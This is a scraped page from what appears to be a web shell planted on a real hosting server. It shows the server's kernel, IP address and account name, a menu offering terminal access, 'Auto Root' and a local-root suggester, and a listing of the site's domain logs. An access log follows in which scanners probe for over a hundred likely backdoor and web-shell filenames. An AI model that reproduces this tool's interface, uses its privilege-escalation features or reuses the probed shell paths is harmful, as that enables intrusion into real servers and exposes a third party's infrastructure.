Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apache /
domlogs /
oishifashion /
Delete
Unzip
Name
Size
Permission
Date
Action
12ap.oishifashion.com
8.71
KB
-rw-r-----
2025-12-23 03:21
12ap.oishifashion.com-ssl_log
15.76
MB
-rw-r-----
2025-12-23 10:03
ap.oishifashion.com
40.62
KB
-rw-r-----
2025-12-23 10:08
ap.oishifashion.com-ssl_log
108.47
MB
-rw-r-----
2025-12-23 10:17
ap.tsgbd.com
24.12
KB
-rw-r-----
2025-12-23 06:58
ap.tsgbd.com-ssl_log
1.39
MB
-rw-r-----
2025-12-23 09:47
ap.tsgbd.com.oishifashion.com
0
B
-rw-r-----
2025-08-12 12:39
ap.tsgbd.com.oishifashion.com-ssl_log
0
B
-rw-r-----
2025-08-12 12:39
ap99.tsgbd.com
788
B
-rw-r-----
2025-12-23 08:22
ap99.tsgbd.com-ssl_log
46.94
KB
-rw-r-----
2025-12-23 09:03
drug.oishifashion.com
42.89
KB
-rw-r-----
2025-12-23 09:30
drug.oishifashion.com-ssl_log
14.99
MB
-rw-r-----
2025-12-23 10:03
etp.oishifashion.com
421
B
-rw-r-----
2025-12-23 09:03
etp.oishifashion.com-ssl_log
1.28
MB
-rw-r-----
2025-12-23 10:03
oishifashion.com
108.94
KB
-rw-r-----
2025-12-23 09:47
oishifashion.com-ssl_log
693.95
KB
-rw-r-----
2025-12-23 10:03
pharmacy.oishifashion.com
636
B
-rw-r-----
2025-12-22 17:46
pharmacy.oishifashion.com-ssl_log
40.7
MB
-rw-r-----
2025-12-23 10:17
tmds.tsgbd.com
38.98
KB
-rw-r-----
2025-12-23 08:05
tmds.tsgbd.com-ssl_log
279.35
KB
-rw-r-----
2025-12-23 10:03
tsgbd.com.oishifashion.com
130.8
KB
-rw-r-----
2025-12-23 10:03
tsgbd.com.oishifashion.com-ssl_log
174.85
KB
-rw-r-----
2025-12-23 10:03
tssms.tsgbd.com
8.95
KB
-rw-r-----
2025-12-23 05:01
tssms.tsgbd.com-ssl_log
49.25
MB
-rw-r-----
2025-12-23 10:11
tt.oishifashion.com
224
B
-rw-r-----
2025-12-23 02:20
tt.oishifashion.com-ssl_log
18.74
MB
-rw-r-----
2025-12-23 10:03
Save
Rename
4.241.206.109 - - [22/Dec/2025:19:00:50 +0600] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:00:52 +0600] "GET /nc4.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:00:53 +0600] "GET /d4.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:00:55 +0600] "GET /ad.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:00:56 +0600] "GET /dlex.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:00:57 +0600] "GET /classwithtostring.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:00:58 +0600] "GET /pass.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:00 +0600] "GET /good.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:01 +0600] "GET /ext.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:02 +0600] "GET /class20.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:04 +0600] "GET /css/index.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:05 +0600] "GET /aa.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:06 +0600] "GET /npi.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:07 +0600] "GET /ahax.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:09 +0600] "GET /pop.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:10 +0600] "GET /file17.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:11 +0600] "GET /wp-includes/fonts/themes.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:12 +0600] "GET /about.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:12 +0600] "GET /litanies.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:14 +0600] "GET /g.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:15 +0600] "GET /readme.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:17 +0600] "GET /kwm4.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:18 +0600] "GET /just2.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:19 +0600] "GET /png.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:21 +0600] "GET /geger.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:22 +0600] "GET /let.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:23 +0600] "GET /np.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:24 +0600] "GET /ask.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:26 +0600] "GET /CLA.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:28 +0600] "GET /wp-admin/index.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:28 +0600] "GET /mek.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:30 +0600] "GET /fjpeb.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:31 +0600] "GET /ex.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:32 +0600] "GET /asd67.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:34 +0600] "GET /zwso.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:35 +0600] "GET /alfa.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:37 +0600] "GET /shlo.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:38 +0600] "GET /sec.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:39 +0600] "GET /natural.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:41 +0600] "GET /1.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:42 +0600] "GET /z.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:44 +0600] "GET /law.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:45 +0600] "GET /bluejackets.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:47 +0600] "GET /php.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:48 +0600] "GET /sx21_1.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:49 +0600] "GET /1aa.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:50 +0600] "GET /nx9.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:52 +0600] "GET /file.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:53 +0600] "GET /aw.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:54 +0600] "GET /sfvul.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:56 +0600] "GET /icdwb.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:57 +0600] "GET /ticket.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:01:58 +0600] "GET /elp.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:00 +0600] "GET /k.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:01 +0600] "GET /amphicyon.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:02 +0600] "GET /wsad.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:04 +0600] "GET /lock1.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:05 +0600] "GET /xp.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:06 +0600] "GET /e.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:08 +0600] "GET /v3.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:09 +0600] "GET /akcc.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:10 +0600] "GET /minik.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:12 +0600] "GET /asasx.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:13 +0600] "GET /nx.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:15 +0600] "GET /themes.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:16 +0600] "GET /acp.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:17 +0600] "GET /xpw.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:19 +0600] "GET /lufix.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:20 +0600] "GET /akp.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:21 +0600] "GET /cwsd.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:22 +0600] "GET /tll.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:24 +0600] "GET /Okxob.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:25 +0600] "GET /idea.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:26 +0600] "GET /pepe.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:28 +0600] "GET /v2.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:29 +0600] "GET /yca.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:30 +0600] "GET /lock360.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:31 +0600] "GET /ot.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:32 +0600] "GET /bolt.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:34 +0600] "GET /j.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:35 +0600] "GET /s.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:36 +0600] "GET /ucp.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:38 +0600] "GET /zse.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:39 +0600] "GET /0x.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:40 +0600] "GET /403.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:41 +0600] "GET /gfile.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:42 +0600] "GET /doc.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:44 +0600] "GET /orm.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:45 +0600] "GET /ay.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:46 +0600] "GET /buy.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:48 +0600] "GET /test.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:49 +0600] "GET /wsa.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:50 +0600] "GET /wolv.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:52 +0600] "GET /ea3f.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:53 +0600] "GET /price.php HTTP/1.1" 301 795 "-" "-" 4.241.206.109 - - [22/Dec/2025:19:02:54 +0600] "GET /gmo.php HTTP/1.1" 301 795 "-" "-" 167.94.138.56 - - [22/Dec/2025:19:57:21 +0600] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.185 - - [22/Dec/2025:21:09:09 +0600] "GET / HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:08 +0600] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:10 +0600] "GET /mda.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:11 +0600] "GET /cheka.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:13 +0600] "GET /cabs.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:14 +0600] "GET /classgoto24.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:16 +0600] "GET /zsz.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:18 +0600] "GET /kaza.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:19 +0600] "GET /lites.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:21 +0600] "GET /bby.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:24 +0600] "GET /get.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:25 +0600] "GET /xtride.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:27 +0600] "GET /ws29.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:28 +0600] "GET /oo.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:30 +0600] "GET /s11.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:31 +0600] "GET /dir.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:33 +0600] "GET /aqw.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:34 +0600] "GET /ca1.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:36 +0600] "GET /file51.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:37 +0600] "GET /abouta.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:39 +0600] "GET /fclas.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:40 +0600] "GET /File.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:42 +0600] "GET /all.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:43 +0600] "GET /bbn.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:45 +0600] "GET /berlin.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:47 +0600] "GET /class-t.api.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:48 +0600] "GET /xz89.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:50 +0600] "GET /thai.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:51 +0600] "GET /lopst.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:53 +0600] "GET /wft.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:54 +0600] "GET /ws28.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:56 +0600] "GET /wsvvs.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:57 +0600] "GET /vbbn.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:58:59 +0600] "GET /pn.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:00 +0600] "GET /fz.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:02 +0600] "GET /sang.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:04 +0600] "GET /0o0.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:05 +0600] "GET /zxl.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:07 +0600] "GET /zwso.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:08 +0600] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:09 +0600] "GET /class19.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:10 +0600] "GET /class20.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:12 +0600] "GET /admin.php?p= HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:12 +0600] "GET /randkeyword.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:14 +0600] "GET /fwe.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:15 +0600] "GET /g.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:17 +0600] "GET /tx1.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:18 +0600] "GET /xv.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:20 +0600] "GET /htaccess.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:21 +0600] "GET /fv.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:23 +0600] "GET /file.php? HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:24 +0600] "GET /lsd.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:26 +0600] "GET /as.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:27 +0600] "GET /wsd.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:29 +0600] "GET /gtc.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:30 +0600] "GET /atx.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:32 +0600] "GET /z60.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:33 +0600] "GET /403.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:35 +0600] "GET /themes.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:36 +0600] "GET /wp-admin/maint/about.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:38 +0600] "GET /wp-admin/network/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:38 +0600] "GET /click.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:40 +0600] "GET /install.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:42 +0600] "GET /simple.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:43 +0600] "GET /css.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:45 +0600] "GET /cong.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:46 +0600] "GET /wp-includes/images/wp-login.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:47 +0600] "GET /w.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:48 +0600] "GET /404.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:50 +0600] "GET /ioxi-o.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:51 +0600] "GET /0x.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:53 +0600] "GET /css.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:54 +0600] "GET /222.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:56 +0600] "GET /wp-content/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:56 +0600] "GET /admin.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:57 +0600] "GET /wp-admin/maint/maint.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [22/Dec/2025:23:59:58 +0600] "GET /classwithtostring.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:00 +0600] "GET /abcd.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:01 +0600] "GET /autoload_classmap.php?p= HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:03 +0600] "GET /inputs.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:04 +0600] "GET /about3.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:06 +0600] "GET /themes/twentytwentytwo/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:07 +0600] "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:09 +0600] "GET /wp-admin/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:11 +0600] "GET /wp-admin/css/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:12 +0600] "GET /manager.php?p= HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:14 +0600] "GET /item.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:15 +0600] "GET /404.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:17 +0600] "GET /wp-content/plugins/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:17 +0600] "GET /sx.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:19 +0600] "GET /wp-admin/maint/admin.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:20 +0600] "GET /alfa.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:21 +0600] "GET /wp-trackback.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:22 +0600] "GET /.well-known/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:24 +0600] "GET /wp-admin/about.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:24 +0600] "GET /wp-includes/ID3/about.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:24 +0600] "GET /css/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:26 +0600] "GET /wp-includes/SimplePie/wp-login.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:26 +0600] "GET /wp-content/themes/about.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:28 +0600] "GET /wp-admin/maint/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:30 +0600] "GET /wp-includes/customize/about.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:30 +0600] "GET /uploads/autoload_classmap.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:32 +0600] "GET /wp-includes/style-engine/about.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:32 +0600] "GET /ww1.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:34 +0600] "GET /about/function.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:35 +0600] "GET /admin/function.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:37 +0600] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:38 +0600] "GET /css/colors/blue/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:40 +0600] "GET /security.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:42 +0600] "GET /wp-admin/user/about.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:42 +0600] "GET /wp-admin/js/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:44 +0600] "GET /wp-content/upgrade/about.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:45 +0600] "GET /wp-includes/assets/index.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:46 +0600] "GET /wp-content/radio.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:47 +0600] "GET /wp-includes/fonts/index.php?p= HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:48 +0600] "GET /.well-known/admin.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:49 +0600] "GET /wp-content/admin.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:51 +0600] "GET /wp-content/plugins/admin.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:53 +0600] "GET /wp-content/themes/twentytwentytwo/index.php?p= HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:54 +0600] "GET /class.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:56 +0600] "GET /bless5.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:57 +0600] "GET /lock360.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:00:59 +0600] "GET /f35.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:00 +0600] "GET /ioxi-o1.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:02 +0600] "GET /ha.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:03 +0600] "GET /gg.php HTTP/1.1" 301 795 "-" "-" 40.113.19.56 - - [23/Dec/2025:00:01:05 +0600] "GET /ar.php 